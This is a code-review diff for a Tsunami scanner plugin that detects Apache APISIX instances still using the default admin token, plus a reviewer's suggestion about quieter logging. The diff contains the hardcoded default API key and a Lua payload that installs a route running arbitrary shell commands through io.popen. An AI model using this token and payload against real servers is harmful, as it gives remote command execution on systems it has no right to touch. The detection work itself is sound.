community/detectors/apache_apisix_default_token/src/main/java/com/google/tsunami/plugins/detectors/rce/apache_default_token/ApacheDefaultTokenDetector.java

```diff
@@ -0,0 +1,188 @@
+                  + "local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n "
+                  + "local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\"upstream\":{\"type"
+                  + "\":\"roundrobin\",\"nodes\":{\"example.com:80\":1}}}";
+  private static final String TOKEN_HEADER_NAME = "X-API-KEY";
+  private static final String TOKEN_VALUE = "edd1c9f034335f136f87ad84b625c8f1";
+
+  private final HttpClient httpClient;
+
+  private final PayloadGenerator payloadGenerator;
+
+  private final Clock utcClock;
+
+  @Inject
+  ApacheDefaultTokenDetector(@UtcClock Clock utcClock, HttpClient httpClient,PayloadGenerator payloadGenerator) {
+    this.httpClient = checkNotNull(httpClient);
+    this.utcClock = checkNotNull(utcClock);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+  }
+
+  @Override
+  public DetectionReportList detect(
+          TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("Apache APISIX Default Admin Token starts detecting.");
+
+    return DetectionReportList.newBuilder()
+            .addAllDetectionReports(
+                    matchedServices.stream()
+                            .filter(NetworkServiceUtils::isWebService)
+                            .filter(this::isServiceVulnerable)
+                            .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                            .collect(toImmutableList()))
+            .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetBaseUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+    String targetVulnerabilityUrl = targetBaseUrl + VUL_PATH;
+    String randomVerifyPath = String.format("tsunami_%s", Instant.now(utcClock).toEpochMilli());
+    PayloadGeneratorConfig config = PayloadGeneratorConfig.newBuilder()
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+            .setInterpretationEnvironment(PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+            .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .build();
+    Payload payload = this.payloadGenerator.generate(config);
+
+    String targetExecuteUrl =
+            targetBaseUrl + randomVerifyPath + "?cmd=" + URLEncoder.encode(payload.getPayload(), UTF_8);
+
+    try {
+      HttpResponse checkIsAPISIXResponse =
+              httpClient.sendAsIs(
+                      get(targetVulnerabilityUrl).setHeaders(HttpHeaders.builder().build()).build());
+      if (!checkIsAPISIXResponse.headers().get("Server").orElse("").contains("APISIX")) {
+        logger.atInfo().log("Target %s is not an Apache APISIX instance.", targetBaseUrl);
+        return false;
+      }
+
+      HttpResponse httpResponse =
```

Comment:
```suggestion
    try {
      HttpResponse checkIsAPISIXResponse =
              httpClient.send(
                      get(targetVulnerabilityUrl).setHeaders(HttpHeaders.builder().build()).build());
      if (!checkIsAPISIXResponse.headers().get("Server").orElse("").contains("APISIX")) {
        return false;
      }
    } catch (IOException | AssertionError e) {
      return false;
    }

    try {
      HttpResponse httpResponse =
```
@hh-hunter, actually can you make this last modification? I've noticed that when the target is not APISIX, the detector is too verbose, printing an exception. In that case we want to silently return instead, so we don't pollute the logs.